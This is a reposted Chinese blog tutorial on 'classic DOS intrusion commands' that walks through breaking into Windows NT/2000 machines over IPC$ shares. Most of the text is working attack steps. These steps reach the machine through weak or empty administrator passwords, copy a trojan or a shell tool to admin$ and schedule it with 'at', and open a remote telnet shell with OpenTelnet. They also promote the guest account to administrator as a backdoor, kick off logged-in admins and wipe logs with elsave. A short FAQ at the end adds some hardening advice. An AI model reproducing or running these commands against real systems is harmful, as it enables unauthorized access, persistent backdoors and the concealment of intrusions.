注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

阿龙博客

海阔凭鱼跃 天高任鸟飞

 
 
 

日志

 
 

经典DOS入侵命令  

2007-01-03 11:07:58|  分类: 电脑网络 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

经典DOS入侵命令
字号 [大 中 小]
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

  11. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名"

  一般用流光,通过扫描弱口令来得到,管理员帐号和密码.

  2. C:\>copy srv.exe \\127.0.0.1\admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

    

  3. C:\>net time \\127.0.0.1

  查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。

    

  4. C:\>at \\127.0.0.1 11:05 srv.exe

  用at命令启动srv.exe吧

  5. C:\>net time \\127.0.0.1

  再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。

    

  6. C:\>telnet 127.0.0.1 99

  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

    

  7.C:\>copy ntlm.exe \\127.0.0.1\admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

    

  8. C:\WINNT\system32>ntlm

  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,*作就像在DOS上*作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

  为了以防万一,我们再把guest激活加到管理组

  10. C:\>net user guest /active:yes

  将对方的Guest用户激活

  11. C:\>net user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

  12. C:\>net localgroup administrators guest /add

  将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算

  13.使用nb2的sql工具。远程执行dos命令

  net start telnet 开telnet服务

  net user mint mint /add 添加用户mint密码为mint

  net localgroup administrators mint /add 将帐号mint升级为管理员

  7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

  8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

  9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

  10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

  11,修改cmd的快捷方式属性为允许其他身份登陆。

  12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

  13,telnet对方ip.直接可以登陆对方电脑了。

  使用命令

  c:\query user 查看对方目前终端登陆状况。

  运行命令

  c:\logoff 1 踢出去一个管理者

  再用c:\query user检查一便~~

  ok了

  14,使用3389远程终端登陆。

  入侵中可能会用到的相关命令

  请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

  1 建立空连接:

  net use \\IP\ipc$ "" /user:""

  2 建立非空连接:

  net use \\IP\ipc$ "psw" /user:"account"

  3 查看远程主机的共享资源(但看不到默认共享)

  net view \\IP

  4 查看本地主机的共享资源(可以看到本地的默认共享)

  net share

  5 得到远程主机的用户名列表

  nbtstat -A IP

  6 得到本地主机的用户列表

  net user

  7 查看远程主机的当前时间

  net time \\IP

  8 显示本地主机当前服务

  net start

  9 启动/关闭本地服务

  net start 服务名 /y

  net stop 服务名 /y

  10 映射远程共享:

  net use z: \\IP\baby

  此命令将共享名为baby的共享资源映射到z盘

  11 删除共享映射

  net use c: /del 删除映射的c盘,其他盘类推

  net use * /del /y删除全部

  12 向远程主机复制文件

  copy \路径\srv.exe \\IP\共享目录名,如:

  copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

  13 远程添加计划任务

  at \\ip 时间 程序名,如:

  at \\127.0.0.0 11:00 love.exe

  注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径

  14 开启远程主机的telnet

  这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

  1)目标开启了ipc$共享

  2)你要拥有管理员密码和帐号

  3)目标开启RemoteRegistry服务,用户就该ntlm认证

  4)对WIN2K/XP有效,NT未经测试

  命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port

  试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

  15 激活用户/加入管理员组

  1 net uesr account /active:yes

  2 net localgroup administrators account /add

  16 关闭远程主机的telnet

  同样需要一个小程序:ResumeTelnet.exe

  命令格式:ResumeTelnet.exe \\server account psw

  试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

  17 删除一个已建立的ipc$连接

  net use \\IP\ipc$ /del

  (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net

  十二 ipc$完整入侵步骤祥解

  其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

  1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空

  2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧

  3上面开telnet的命令没忘吧,要用到opentelnet这个小程序

  c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90

  如果返回如下信息

  *******************************************************

  Remote Telnet Configure, by refdom

  Email: refdom@263.net

  OpenTelnet.exe

  UsagepenTelnet.exe \\server username password NTLMAuthor telnetport

  *******************************************************

  Connecting \\192.168.21.*...Successfully!

  NOTICE!!!!!!

  The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

  Starting telnet service...

  telnet service is started successfully! telnet service is running!

  BINGLE!!!Yeah!!

  Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

  Disconnecting server...Successfully!

  *说明你已经打开了一个端口90的telnet。

  4 现在我们telnet上去

  telnet 192.168.21.* 90

  如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了

  5 C:\>net user guest /active:yes

  *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no

  6 C:\>net user guest 1234

  *将Guest的密码改为1234,或者改成你喜欢的密码

  7 C:\>net localgroup administrators guest /add

  *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。

  8 好了,现在我们来走另一条路,给它传个木马玩玩

  9 首先,我们先建立起ipc$连接

  C:\>net use \\192.168.21.*\ipc$ "" /user:administrator

  10 既然要上传东西,就要先知道它开了什么共享

  C:\>net view \\192.168.21.*

  在 \\192.168.21.*的共享资源

  资源共享名 类型 用途 注释

  -----------------------------------------------------------

  C Disk

  D Disk

  命令成功完成。

  *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。

  11 C:\>copy love.exe \\192.168.21.*\c

  已复制 1 个文件

  *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现

  12 运行木马前,我们先看看它现在的时间

  net time \\192.168.21.*

  \\192.168.21.*的当前时间是 2003/8/22 上午 11:00

  命令成功完成

  13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了

  C:\>at \\192.168.21.* 11:02 c:\love.exe

  新加了一项作业,其作业

  14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了

  嗯,好了,两种基本方法都讲了。如果你对上面的*作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。

  讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

  1,怎样建立空连接,它有什么用?

  答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。

  对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。

  2.为什么我连不上IPC$?

  答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

  2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"

  注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

  3,根据返回的错误号分析原因:

  错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;

  错误号51,Windows 无法找到网络路径 : 网络有问题;

  错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

  错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

  错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

  错误号1326,未知的用户名或错误密码 : 原因很明显了;

  错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

  错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

  4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。

  5,怎样打开目标的IPC$?

  答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

  6,怎样映射和访问默认共享?

  答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。

  如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。

  7,如何删除映射和ipc$连接?

  答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。

  用命令 net use z: /del 删除映射的z盘,其他盘类推。

  用命令 net use * /del 删除全部。会有提示要求按y确认。

  8,连上ipc$然后我能做什么?

  答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

  9,怎样防止别人用ips$和默认共享入侵我?

  答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

  1,先把已有的删除

  net share ipc$ /del

  net share admin$ /del

  net share c$ /del

  …………(有几个删几个)

  2,禁止别人空连接

    首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。

    3,禁止自动打开默认共享

    对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。

  对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。

  如果上面所说的主键不存在,就新建一个再改键值。

  B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)

  net stop lanmanserver

  可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

  C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。

  D、还有一个办法就是装防火墙,或者端口过滤。


 

  评论这张
 
阅读(70)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017